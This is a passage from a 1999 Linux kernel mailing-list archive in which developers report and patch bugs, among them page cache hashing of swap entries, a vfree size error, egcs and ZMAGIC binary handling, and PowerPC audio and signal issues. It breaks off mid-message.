        void *p;
 

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* BUG in dmasound.c, allocating buffers
@ 1999-01-31 20:21 60% Scott Sams
  0 siblings, 0 replies; 200+ results
From: Scott Sams @ 1999-01-31 20:21 UTC (permalink / raw)
  To: linuxppc-dev


Hi,

I am running linux-2.2.0 and I noticed that the kernel crashed 4 times
in one day when I was playing mp3s (mpg123-p, gqmpeg-0.4.5), always when
a new song was going to be played, and usually after 30 minutes of
continuous play. There was absolutely no warning message on the screen
or in the logs, just the entire system froze, with the exception of the
console cursor appearing and blinking in the upper left corner of the
screen.

This got me digging into dmasound.c and looking at the cvs log. The last
version I used, this problem did not occur. This was linux-2.1.125 using
dmasound.c version 1.29. Since then, there have been several updates,
notably 1.33:

>Patch from Jes/Andreas to make it only allocate buffers when opened.

I think that the bug must lie in there, maybe in the sq_allocate_buffers
or sq_release_buffers functions.

I also saw a patch, 1.37, which said it fixed a couple of bugs that let
the user crash the kernel. I applied these by hand to my version of
dmasound.c, just to be safe, but the same crash happened later.

I don't have the knowledge to fix this bug, but I'll bet if someone who
is knowledgable looked over the code I have isolated, they will find out
what is going on.

At the very least, someone can insert some debugging output that may
help discover the problem. I will be glad to test anything.

Thanks,

Scott Sams

-- 
 ____ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      Scott Sams         
(____  _  _-|-|-                    sbsams@eos.ncsu.edu      
_____)(__(_)| |        http://www.catt.ncsu.edu/~sbsams
~~~~~~~~~~~~~~~~

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 60%]

* Re: AWACS Bug
  1999-01-28 14:01 64% AWACS Bug Russell Hires
@ 1999-02-02  4:53 64% ` Paul Mackerras
  0 siblings, 0 replies; 200+ results
From: Paul Mackerras @ 1999-02-02  4:53 UTC (permalink / raw)
  To: inet2; +Cc: linuxppc-dev


Russell Hires <inet2@akos.net> wrote:

> For some reason AWACS is causing Linux to crash. Here's the error
> message I get: AWACS: error, status 4f40da9. I have a G3/266, which I
> bought in late November 1998. 64 MB RAM, 6MB VRAM, DVD-ROM, 4 G SCSI HD
> that runs Linux on 1.5 G partition (which is, of course, divided up into
> /usr and so on...)  using the 2.2pre9 kernel (final).
> 
> About my crashes: it seems to happen when I use BootX the Application,
> and not
> BootX the Extension. Also, it happens when I try to backspace too much

What's happening is I think the same as what happens on the iMac: when
you run the BootX app to boot linux, and it asks macos to shut down,
macos shuts down the awacs, in such a fashion that the only thing that
will start it up again is a hard reset. :-(  If you do

     cat /proc/device-tree/pci/mac-io/davbus/awacs/compatible

and you see a string including "burgundy", that's the problem.

I have managed to work out quite a bit about the burgundy so far.
Its registers can be read as well as written, unlike the earlier
awacses, which makes it much easier to work out what macos is doing.
Shortly I expect to have a new dmasound.c which will support the
burgundy properly.

Paul.

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* CDROM driver bug?
@ 1999-02-03  2:23 63% Sean Harding
  0 siblings, 0 replies; 200+ results
From: Sean Harding @ 1999-02-03  2:23 UTC (permalink / raw)
  To: linuxppc-dev; +Cc: linuxppc-user


I'm having some trouble with the CD driver in the current (2.2.1) kernel.
I have an "enhanced CD" which it won't play as an audio CD. xmcd can
access it enough to identify it with CDDB, but clicking 'play' produces
this message in the log:

Feb  2 18:15:29 juliet kernel: sr0: CDROM (ioctl) error, command:
UNKNOWN(0x47) 00 00 00 02 00 45 1d 08 00 
Feb  2 18:15:29 juliet kernel: extra data not valid Current error sr00:00:
sense key Blank Check
Feb  2 18:15:29 juliet kernel: Additional sense indicates Illegal mode for
this track

cdp says:

play(150,312674)
                msf = 0:2:0 69:28:74
                                    CDROMPLAYMSF: I/O error

Since this disc works properly in every other player and OS I've tried, my
best guess is that it is a bug in the CD driver code. I have an Apple 8x
CDROM drive (the 1200i, I believe).

Any ideas on how to fix this?

sean

-- 
Sean Harding sharding@oregon.uoregon.edu|"art may imitate life
http://gladstone.uoregon.edu/~sharding/ | but life imitates t.v."
Consulting: http://www.efn.org/~seanh/  | --ani difranco


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 63%]

* swapcache bug?
@ 1999-02-07 18:21 64% Manfred Spraul
  1999-02-07 21:30 64% ` Eric W. Biederman
  1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
  0 siblings, 2 replies; 200+ results
From: Manfred Spraul @ 1999-02-07 18:21 UTC (permalink / raw)
  To: linux-mm@kvack.org

I'm currently debugging my physical memory ramdisk, and I see lots of
entries in the page cache that have 'page->offset' which aren't
multiples of 4096. (they are multiples of 256)
All of them belong to swapper_inode.

If this is the intended behaviour, then page_hash() should be changed:
it assumes that 'page->offset' is a multiple of 4096.

If this should not happen, please ask me for further details.

Note that there is NO crash, just lots of entries with the same hash
value.
---
- 2.2.1 kernel
- 12 MB Ram
- 72256 kB Swap-partition
---
	Manfred
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
@ 1999-02-08 17:32 64%   ` Linus Torvalds
  1999-02-08 17:51 60%     ` Stephen C. Tweedie
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-02-08 17:32 UTC (permalink / raw)
  To: Stephen C. Tweedie; +Cc: masp0008, linux-mm@kvack.org


On Mon, 8 Feb 1999, Stephen C. Tweedie wrote:
> 
> Good point, the line include/linux/pagemap.h:39,
> 
> 	return s(i+o) & (PAGE_HASH_SIZE-1);
> 
> should probably be 
> 
> 	return s(i+o+offset) & (PAGE_HASH_SIZE-1);
> 
> to mix in the low order bits for swap entries.  Well spotted.  Anyone
> see anything wrong with this one-liner change?

Yes, the above will potentially result in different hash entries for the
same page, which means that we now have aliasing and basically just random
behaviour. 

It _may_ be that the hash function is always called with a page-aligned
offset, but that was not how it was strictly meant to be: the way the
thing was envisioned you could just find the page at "offset" by doing

	page_hash(inode,offset)

without page-aligning offset before you did this.

If anything, maybe the swap cache should just use the high bits in the
"offset" field (or at least prefer to do so: something like

	page->offset = swap_entry_to_offset(entry);

and 
	entry = offset_to_swap_entry(page->offset);

that does a PAGE_MASK_BITS rotate on the bits..

		Linus

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 17:32 64%   ` Linus Torvalds
@ 1999-02-08 17:51 60%     ` Stephen C. Tweedie
  1999-02-08 18:48 62%       ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: Stephen C. Tweedie @ 1999-02-08 17:51 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org

Hi,

On Mon, 8 Feb 1999 09:32:24 -0800 (PST), Linus Torvalds
<torvalds@transmeta.com> said:

> It _may_ be that the hash function is always called with a page-aligned
> offset, but that was not how it was strictly meant to be: the way the
> thing was envisioned you could just find the page at "offset" by doing

> 	page_hash(inode,offset)

It does appear to be: we enforce it pretty much everywhere I can see,
with one possible exception: filemap_nopage(), which assumes
area->vm_offset is already page-aligned.  I think we can still violate
that internally if we are mapping a ZMAGIC binary (urgh), but the VM
breaks anyway if we do that: update_vm_cache cannot deal with such
pages, for a start.

The assumption that we might have flexible offsets will break
__find_page massively anyway, because we _always_ lookup the struct page
by exact match on the offset; __find_page never tries to align things
itself.

Linus, I know Matti Aarnio has been working on supporting >32bit offsets
on Intel, and for that we really do need to start using the low bits in
the page offset for something more useful than MBZ padding.  If there is
a long-term desire to keep those bits in the offset insignificant then
that will really hurt his work; otherwise, I can't see mixing in the
low-order bits to the page hash breaking anything new.

> If anything, maybe the swap cache should just use the high bits in the
> "offset" field 

Yes, we can certainly do that to fix the current has collision problems,
but since there are long term reasons for using more bits of
significance in the page cache offset, it would be good to know whether
you'd be willing to entertain that possibility.  If so, we'll need a
hash function which observes the low bits anyway.

--Stephen
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 60%]

* Re: swapcache bug?
  1999-02-07 18:21 64% swapcache bug? Manfred Spraul
@ 1999-02-07 21:30 64% ` Eric W. Biederman
  1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
  1 sibling, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-02-07 21:30 UTC (permalink / raw)
  To: masp0008; +Cc: linux-mm@kvack.org

>>>>> "MS" == Manfred Spraul <masp0008@stud.uni-sb.de> writes:

MS> I'm currently debugging my physical memory ramdisk, and I see lots of
MS> entries in the page cache that have 'page->offset' which aren't
MS> multiples of 4096. (they are multiples of 256)
MS> All of them belong to swapper_inode.

MS> If this is the intended behaviour, then page_hash() should be changed:
MS> it assumes that 'page->offset' is a multiple of 4096.

Yes.  Because for the swap cache we store the swap entry which is already
has the page size shifted out of it, but it's also setup so you can store
it directly in a pte which means some 0 bits.

Good spotting, but unless someone can show a significant performance impact 
changing page_hash should wait for 2.3.

Eric
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* [PATCH] Re: swapcache bug?
  1999-02-07 18:21 64% swapcache bug? Manfred Spraul
  1999-02-07 21:30 64% ` Eric W. Biederman
@ 1999-02-08 16:39 64% ` Stephen C. Tweedie
  1999-02-08 17:32 64%   ` Linus Torvalds
  1 sibling, 1 reply; 200+ results
From: Stephen C. Tweedie @ 1999-02-08 16:39 UTC (permalink / raw)
  To: masp0008, Linus Torvalds; +Cc: linux-mm@kvack.org, Stephen Tweedie

Hi,

On Sun, 07 Feb 1999 19:21:38 +0100, Manfred Spraul
<masp0008@stud.uni-sb.de> said:

> I'm currently debugging my physical memory ramdisk, and I see lots of
> entries in the page cache that have 'page->offset' which aren't
> multiples of 4096. (they are multiples of 256)
> All of them belong to swapper_inode.

That is normal.

> If this is the intended behaviour, then page_hash() should be changed:
> it assumes that 'page->offset' is a multiple of 4096.

Good point, the line include/linux/pagemap.h:39,

	return s(i+o) & (PAGE_HASH_SIZE-1);

should probably be 

	return s(i+o+offset) & (PAGE_HASH_SIZE-1);

to mix in the low order bits for swap entries.  Well spotted.  Anyone
see anything wrong with this one-liner change?

--Stephen
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 17:51 60%     ` Stephen C. Tweedie
@ 1999-02-08 18:48 62%       ` Linus Torvalds
  1999-02-08 21:13 60%         ` Matti Aarnio
  1999-02-09  7:15 64%         ` Eric W. Biederman
  0 siblings, 2 replies; 200+ results
From: Linus Torvalds @ 1999-02-08 18:48 UTC (permalink / raw)
  To: Stephen C. Tweedie; +Cc: masp0008, linux-mm@kvack.org


On Mon, 8 Feb 1999, Stephen C. Tweedie wrote:
> 
> It does appear to be: we enforce it pretty much everywhere I can see,
> with one possible exception: filemap_nopage(), which assumes
> area->vm_offset is already page-aligned.  I think we can still violate
> that internally if we are mapping a ZMAGIC binary (urgh), but the VM
> breaks anyway if we do that: update_vm_cache cannot deal with such
> pages, for a start.

This was done on purpose: it still works as a mapping, but it isn't
coherent with regards to writes to the file. That's fine, as writing to an
executable while it has been mapped is a losing proposition anyway, and
you can't get access through these non-page-aligned mappings any other way
(the "mmap()" system calls etc will all enforce page-aligned regions,
because coherency just wouldn't be possible otherwise). 

> The assumption that we might have flexible offsets will break
> __find_page massively anyway, because we _always_ lookup the struct page
> by exact match on the offset; __find_page never tries to align things
> itself.

Good point.

> Linus, I know Matti Aarnio has been working on supporting >32bit offsets
> on Intel, and for that we really do need to start using the low bits in
> the page offset for something more useful than MBZ padding. 

Yes. The page offset will become a "sector offset" (I'd actually like to
make it a page number, but then I'd have to break ZMAGIC dynamic loading
due to the fractional page offsets, so it's not worth it for three extra
bits), and that gives you 41 bits of addressing even on a 32-bit machine.
Which is plenty - considering that by the time you need more than that
you'd _really_ better be running on a larger machine anyway. 

Note that some patches I saw (I think by Matti) made "page->offset" a long
long, and that is never going to happen. That's just a stupid waste of
time and memory.

>						 If there is
> a long-term desire to keep those bits in the offset insignificant then
> that will really hurt his work; otherwise, I can't see mixing in the
> low-order bits to the page hash breaking anything new.

Ok, you convinced me. 

		Linus

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 62%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 18:48 62%       ` Linus Torvalds
@ 1999-02-08 21:13 60%         ` Matti Aarnio
  1999-02-09  7:15 64%         ` Eric W. Biederman
  1 sibling, 0 replies; 200+ results
From: Matti Aarnio @ 1999-02-08 21:13 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: sct, masp0008, linux-mm

Linus Torvalds <torvalds@transmeta.com> wrote:
...
> > Linus, I know Matti Aarnio has been working on supporting >32bit offsets
> > on Intel, and for that we really do need to start using the low bits in
> > the page offset for something more useful than MBZ padding. 
> 
> Yes. The page offset will become a "sector offset" (I'd actually like to
> make it a page number, but then I'd have to break ZMAGIC dynamic loading
> due to the fractional page offsets, so it's not worth it for three extra
> bits), and that gives you 41 bits of addressing even on a 32-bit machine.
> Which is plenty - considering that by the time you need more than that
> you'd _really_ better be running on a larger machine anyway. 

	I forgot (didn't log), who sent me a patch to my L-F-S stuff
	for ZMAGIC page mis-alignment report.  (It was somebody here
	at linux-mm list)  His comment was that only *very old* systems
	contain ZMAGIC files with alignments not already in page
	granularity.

	Given certain limitations in low-level block drivers, using that
	'sector index' idea might be worthy.  It gives us essentially up
	to 512 * 4GB or 2 TB file sizes, which matches current low-level
	limitations.

	However, now doing page offset work, we might need to mask the low
	bits of the sector index to do page cache searches.  (Unless the
	alignment is always guaranteed ?)

> Note that some patches I saw (I think by Matti) made "page->offset" a long
> long, and that is never going to happen. That's just a stupid waste of
> time and memory.

	Good heavens! No!  That can't have been mine.

	In my patches the 'page->offset' became ADT called 'pgoff_t'
	which I used to do compile time trapping of missing convertions.
	When simplified ("#if 1" -> "#if 0" in <linux/mm.h> header file),
	the type is just 'u_long'.

	I don't think you have seen my patches, I have posted the URL,
	but not the patches themselves.

	With recent talks in linux-kernel about internal VFS ABI stability
	being an issue, my current L-F-S patch is *not* ready for 2.2.*.
	It changes one thing, and adds another in the inode_operations
	structure, plus adds a field into 'struct task'.

	I would wait a bit until 2.3 opens, collect a bit of experience
	of it there, and then backport (without doing VFS ABI changes) to
	2.2.*.    Otherwise: "Damn the torpedoes!  Full steam ahead!".
	(And we would hear lots of noicy torpedoes...)

... 
> 		Linus

/Matti Aarnio <matti.aarnio@sonera.fi>
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 60%]

* MIPS egcs bug, was: working modutils for DECStation Linux ??
       [not found]     <199902071436.PAA11929@sparta.research.kpn.com>
@ 1999-02-08  5:12 64% ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1999-02-08  5:12 UTC (permalink / raw)
  To: Karel van Houten; +Cc: linux, linux-mips, linux-mips

On Sun, Feb 07, 1999 at 03:36:40PM +0100, Karel van Houten wrote:

> The '#ident' line makes the array initialisation incorrect. After removing
> this line, depmod compiles and works correctly.

Thanks for tracking this down.

> EGCS guru's, any hints?

Adding this to egcs-1.0.2/gcc/config/mips/linux.h at the bottom should
fix things:

/* Attach a special .ident directive to the end of the file to identify
   the version of GCC which compiled this code.  The format of the
   .ident string is patterned after the ones produced by native svr4
   C compilers.  */

#undef IDENT_ASM_OP
#define IDENT_ASM_OP ".ident"

/* Output #ident as a .ident.  */

#undef ASM_OUTPUT_IDENT
#define ASM_OUTPUT_IDENT(FILE, NAME) \
  fprintf (FILE, "\t%s\t\"%s\"\n", IDENT_ASM_OP, NAME);

I'll test this and make a real patch later.  Until that -fno-ident is the
silver bullet to avoid such sick effects.

IRIX people: I think the same bug also hits IRIX, RISC/os and others,
it's probably as long in gcc / egcs as I can think back.  At least for some
of the affected targets the above fix can not be used.

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-08 18:48 62%       ` Linus Torvalds
  1999-02-08 21:13 60%         ` Matti Aarnio
@ 1999-02-09  7:15 64%         ` Eric W. Biederman
  1999-02-09 16:32 64%           ` Linus Torvalds
  1 sibling, 1 reply; 200+ results
From: Eric W. Biederman @ 1999-02-09  7:15 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> Yes. The page offset will become a "sector offset" (I'd actually like to
LT> make it a page number, but then I'd have to break ZMAGIC dynamic loading
LT> due to the fractional page offsets, so it's not worth it for three extra
LT> bits), and that gives you 41 bits of addressing even on a 32-bit machine.
LT> Which is plenty - considering that by the time you need more than that
LT> you'd _really_ better be running on a larger machine anyway. 

???  With the latter OMAGIC format everthing is page aligned already.

I have a patch that removes page sharing support from ZMAGIC but keeps
everything functional.  Tested with a OMAGIC libc ZMAGIC doom and
ZMAGIC Xlibs.   This is on my queue for submission to 2.3.

Eric
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-09  7:15 64%         ` Eric W. Biederman
@ 1999-02-09 16:32 64%           ` Linus Torvalds
  1999-02-10  0:28 55%             ` Eric W. Biederman
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-02-09 16:32 UTC (permalink / raw)
  To: Eric W. Biederman; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org


On 9 Feb 1999, Eric W. Biederman wrote:
> 
> ???  With the latter OMAGIC format everthing is page aligned already.

Yes.

However, it's a question of pride too. I don't want to break "normal" user
land applications (as opposed to things like "ifconfig" that are really
very very special), unless I really have to.

As such, I want to support even the old 1kB-aligned ZMAGIC binaries for as
long as it's not a liability, and quite frankly the issue of whether you
make the page cache "offset" be a sector or a page offset is purely a
thing of taste, not a liability.

			Linus

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: [PATCH] Re: swapcache bug?
  1999-02-09 16:32 64%           ` Linus Torvalds
@ 1999-02-10  0:28 55%             ` Eric W. Biederman
  0 siblings, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-02-10  0:28 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Stephen C. Tweedie, masp0008, linux-mm@kvack.org

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> On 9 Feb 1999, Eric W. Biederman wrote:
>> 
>> ???  With the latter OMAGIC format everthing is page aligned already.

LT> Yes.

LT> However, it's a question of pride too. I don't want to break "normal" user
LT> land applications (as opposed to things like "ifconfig" that are really
LT> very very special), unless I really have to.

You don't have to break programs, just have them use a little more memory.

The way we currently support shared ZMAGIC binaries is a real hack.
There are a lot of cases where it doesn't work. 2k+ ext2fs, and
network file systems.

And the code is very unobvious.

The filesytem code becomes much cleaner if we remove support for non
aligned mappings.

The following patch is all that it takes to remove the need to support
non-aligned mappings.  Everything still works we just use a little
more memory (if multiple copies of the program are running at once),
and complain.  

Avoiding this patch is not worth losing 3 bits of address space, and
code clarity.  

Eric

diff -uNrX linux-ignore-files linux-2.1.132.eb2/fs/binfmt_aout.c linux-2.1.132.eb3.make/fs/binfmt_aout.c
--- linux-2.1.132.eb2/fs/binfmt_aout.c	Fri Dec 25 16:42:47 1998
+++ linux-2.1.132.eb3.make/fs/binfmt_aout.c	Fri Dec 25 22:42:36 1998
@@ -409,7 +409,14 @@
 			return fd;
 		file = fcheck(fd);
 
-		if (!file->f_op || !file->f_op->mmap) {
+		if ((fd_offset & ~PAGE_MASK) != 0) {
+			printk(KERN_WARNING 
+			       "fd_offset is not page aligned. Please convert program: %s\n",
+			       file->f_dentry->d_name.name
+			       );
+		}
+
+		if (!file->f_op || !file->f_op->mmap || ((fd_offset & ~PAGE_MASK) != 0)) {
 			sys_close(fd);
 			do_mmap(NULL, 0, ex.a_text+ex.a_data,
 				PROT_READ|PROT_WRITE|PROT_EXEC,
@@ -530,6 +537,24 @@
 
 	start_addr =  ex.a_entry & 0xfffff000;
 
+	if ((N_TXTOFF(ex) & ~PAGE_MASK) != 0) {
+		printk(KERN_WARNING 
+		       "N_TXTOFF is not page aligned. Please convert library: %s\n",
+		       file->f_dentry->d_name.name
+		       );
+		
+		do_mmap(NULL, start_addr & PAGE_MASK, ex.a_text + ex.a_data + ex.a_bss,
+			PROT_READ | PROT_WRITE | PROT_EXEC,
+			MAP_FIXED| MAP_PRIVATE, 0);
+		
+		read_exec(file->f_dentry, N_TXTOFF(ex),
+			  (char *)start_addr, ex.a_text + ex.a_data, 0);
+		flush_icache_range((unsigned long) start_addr,
+				   (unsigned long) start_addr + ex.a_text + ex.a_data);
+
+		retval = 0;
+		goto out_putf;
+	}
 	/* Now use mmap to map the library into memory. */
 	error = do_mmap(file, start_addr, ex.a_text + ex.a_data,
 			PROT_READ | PROT_WRITE | PROT_EXEC,
diff -uNrX linux-ignore-files linux-2.1.132.eb2/mm/filemap.c linux-2.1.132.eb3.make/mm/filemap.c
--- linux-2.1.132.eb2/mm/filemap.c	Fri Dec 25 16:48:50 1998
+++ linux-2.1.132.eb3.make/mm/filemap.c	Fri Dec 25 23:04:10 1998
@@ -1350,7 +1350,7 @@
 			return -EINVAL;
 	} else {
 		ops = &file_private_mmap;
-		if (vma->vm_offset & (inode->i_sb->s_blocksize - 1))
+		if (vma->vm_offset & (PAGE_SIZE - 1))
 			return -EINVAL;
 	}
 	if (!inode->i_sb || !S_ISREG(inode->i_mode))



--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 55%]

* Linux 2.2.1 and 2.2.0-pre5 bug
@ 1999-02-14 22:50 64% ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1999-02-14 22:50 UTC (permalink / raw)
  To: linux, linux-mips, linux-mips

Hi,

I'm about to commit Linux 2.2.1 into CVS.  I received email from people who
were attempting to upgrade their older 2.1.131 sources themselfes and ran
into a problem with 2.2.2-pre5.  Well, I fixed that problem in my source
which are going to CVS, so try these sources.

  Ralf

^ permalink raw reply	[relevance 64%]

* PATCH - bug in vfree
@ 1999-02-20 11:46 62% Neil Booth
  1999-02-20 12:14 64% ` Neil Booth
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Neil Booth @ 1999-02-20 11:46 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Alan Cox, linux-mm

[-- Attachment #1: Type: text/plain, Size: 1150 bytes --]

Linus,

I posted this bug on the kernel mailing list last year, but it never got
fixed, probably as I didn't include a patch. I attach a patch this time
against kernel 2.2.1. The bug is rare, but can lead to kernel virtual
memory corruption.

Quick description:- vfree forgets to subtract the extra cushion page
from the size of each virtual memory area stored in vmlist when it calls
vmfree_area_pages. This means that only the  vmalloc-requested size is
allocated by vmalloc_area_pages, but the requested size PLUS the cushion
page is freed by vmfree_area_pages.

More deeply:- Close inspection of get_vm_area reveals that
(intentionally?) it does NOT insist there be a cushion page behind a VMA
that is placed in front of a previously-allocated VMA, it ONLY
guarantees that a cushion page lies in front of newly-allocated VMAs.
Thus two VMAs could be immediately adjacent without a cushion page, and
coupled with the vfree bug means that vfree-ing the first VMA also frees
the first page of the second VMA, with dire consequences.

I have described this as clearly as I can, I hope it makes sense. Alan,
this same bug also exists in 2.0.36.

Neil.

[-- Attachment #2: vfree-patch --]
[-- Type: text/plain, Size: 384 bytes --]

--- linux/mm/vmalloc.c~	Sun Jan 24 19:21:06 1999
+++ linux/mm/vmalloc.c	Sat Feb 20 20:17:11 1999
@@ -187,7 +187,7 @@
 	for (p = &vmlist ; (tmp = *p) ; p = &tmp->next) {
 		if (tmp->addr == addr) {
 			*p = tmp->next;
-			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size);
+			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size - PAGE_SIZE);
 			kfree(tmp);
 			return;
 		}

^ permalink raw reply	[relevance 62%]

* Re: PATCH - bug in vfree
  1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
@ 1999-02-20 12:14 64% ` Neil Booth
  1999-02-27  2:39 64%   ` Neil Booth
  1999-02-22 20:31 64% ` Kanoj Sarcar
  1999-02-25  0:47 64% ` Andrea Arcangeli
  2 siblings, 1 reply; 200+ results
From: Neil Booth @ 1999-02-20 12:14 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Alan Cox, linux-mm

Neil Booth wrote:

> More deeply:- Close inspection of get_vm_area reveals that
> (intentionally?) it does NOT insist there be a cushion page behind a VMA
> that is placed in front of a previously-allocated VMA, it ONLY
> guarantees that a cushion page lies in front of newly-allocated VMAs.

Sorry, this is not correct (mistook < for <=). The bug report is
correct, though.

Neil.
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* egcs-1.1.1-1c bug (was Re: major ksyms problem)
       [not found]     <Pine.LNX.4.05.9902220432430.2138-100000@localhost.erols.com>
@ 1999-02-22 14:36 64% ` Tom Vier
  1999-02-23  7:22 64%   ` Gary Thomas
       [not found]     ` <Pine.LNX.4.05.9902220928100.405-100000@localhost.erols.com >
  1 sibling, 1 reply; 200+ results
From: Tom Vier @ 1999-02-22 14:36 UTC (permalink / raw)
  To: Tom Vier; +Cc: mklinux-development-system, mklinux-setup, linuxppc-dev


it's an egcs bug. i think it's not aligning instructions properly, cuz
i believe the 601 is more strict about alignment. is anyone having
problems using bsd_comp.o, ppp_deflate.o, and hfs.o on a non-601
machine built under pre-R5 (egcs-1.1.1-1c)?

i rebuilt bsd_comp.o and ppp_deflate.o w/ egcs-1.0-2e from dr3 and
they worked perfectly.

egcs-1.1.1-1c failed using -O0, -O2, and -O3 with all combinations of
-mcpu=601, -mcpu=604, and -fno-schedule-insns. -fpic did work, however
it addes an offset table symbol that makes insmod complain.

is this a know problem?

> > Feb 21 09:36:18 zero insmod: /lib/modules/2.0.37-osfmach3/net/bsd_comp.o:
> > Unhandled relocation of type 26 for .L343

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/



[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* I believe I found a bug in /arch/ppc/kernel/signal.c
@ 1999-02-22 14:36 59% D.J. Barrow
  1999-02-22 18:53 64% ` Benjamin Herrenschmidt
  0 siblings, 1 reply; 200+ results
From: D.J. Barrow @ 1999-02-22 14:36 UTC (permalink / raw)
  To: Gary Thomas; +Cc: linuxppc-dev


Hi Gary/Others,
I'm currently using 2.1.123 ( yup I know this is old but the bug on
reading the source is still in 2.1.124 DR4 ) & possibly is still
there. Unfortunately my net connection isn't good enough to download
the latest 2.2 stuff in less than a few hours.

The bug manifested itself in tftp, when longjmp'ing out
of the signal handler on timeouts.

Resulting in....
a )sys_sigreturn not get called 
b) signals queued & trampoline stuff on the user stack being trashed.
c) SIGALRM being blocked forever.

The stuff works on intel & it also works if I kludge handle signal not
to block SIGALRM.

I originally thought fixing longjmp with a syscall would be a good
idea on conversing with other hackers it isn't.

The code here I believe can be simplified if you didn't do all the
queueing in handle_signal & remove the while/dequeue loop from
do_signal & make do_signal also work as sys_sigreturn & unblock the
signals just before sending them, this way I don't think you'll lose
